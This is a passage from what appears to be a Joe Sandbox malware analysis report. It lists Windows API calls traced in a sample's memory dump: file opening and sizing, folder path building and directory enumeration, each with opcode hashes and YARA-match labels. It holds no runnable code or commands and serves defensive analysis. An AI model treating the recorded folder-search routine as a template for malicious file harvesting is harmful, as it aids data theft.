                                    • CreateFileA.KERNEL32(00FF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00FF3AEE,?), ref: 00FF92FC
                                    • GetFileSizeEx.KERNEL32(000000FF,00FF3AEE), ref: 00FF9319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00FF9327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 37c156d37ab269831244a78487fe0f99ad43d96907eebc76c3d726172ea63f41
                                    • Instruction ID: eb8b1aaffa0457ea2c294a5282707555674b4f946a9466c8791f34a1c6233e02
                                    • Opcode Fuzzy Hash: 37c156d37ab269831244a78487fe0f99ad43d96907eebc76c3d726172ea63f41
                                    • Instruction Fuzzy Hash: 19F04F35E44208BBDB34DFB4EC49FAE77B9AB48720F10C254FA51A76C4D6B096019B44
                                    APIs
                                    • __getptd.LIBCMT ref: 00FFC74E
                                      • Part of subcall function 00FFBF9F: __amsg_exit.LIBCMT ref: 00FFBFAF
                                    • __getptd.LIBCMT ref: 00FFC765
                                    • __amsg_exit.LIBCMT ref: 00FFC773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00FFC797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 8920cbca62c7a87c1352b11e55655de8b36c093b1f910cbda73d7aadf0ea766d
                                    • Instruction ID: 75e585ad85b5ef0883bcb556f76af643a045cbf7429f20563128e4cef405f3ec
                                    • Opcode Fuzzy Hash: 8920cbca62c7a87c1352b11e55655de8b36c093b1f910cbda73d7aadf0ea766d
                                    • Instruction Fuzzy Hash: 6AF06D33D0462D9BD721BBB89D06B7937A06F00721F244149F654AA1F2DB6C5940BF96
                                    APIs
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4F7A
                                    • lstrcat.KERNEL32(?,01001070), ref: 00FF4F97
                                    • lstrcat.KERNEL32(?,01809290), ref: 00FF4FAB
                                    • lstrcat.KERNEL32(?,01001074), ref: 00FF4FBD
                                      • Part of subcall function 00FF4910: wsprintfA.USER32 ref: 00FF492C
                                      • Part of subcall function 00FF4910: FindFirstFileA.KERNEL32(?,?), ref: 00FF4943
                                      • Part of subcall function 00FF4910: StrCmpCA.SHLWAPI(?,01000FDC), ref: 00FF4971
                                      • Part of subcall function 00FF4910: StrCmpCA.SHLWAPI(?,01000FE0), ref: 00FF4987
                                      • Part of subcall function 00FF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FF4B7D
                                      • Part of subcall function 00FF4910: FindClose.KERNEL32(000000FF), ref: 00FF4B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: efb612f10e16980509807ef07c8fdbe2a1a472633003a221cf4427ff2f703805
                                    • Instruction ID: 3b40dc6087153aaec72030999e92654b8cb17c821d1c16e436d3bc833ed47699
                                    • Opcode Fuzzy Hash: efb612f10e16980509807ef07c8fdbe2a1a472633003a221cf4427ff2f703805
                                    • Instruction Fuzzy Hash: B721887690020867D774FF60EC4AEEE333CAB54700F004558F69997585EEB8A6C99B92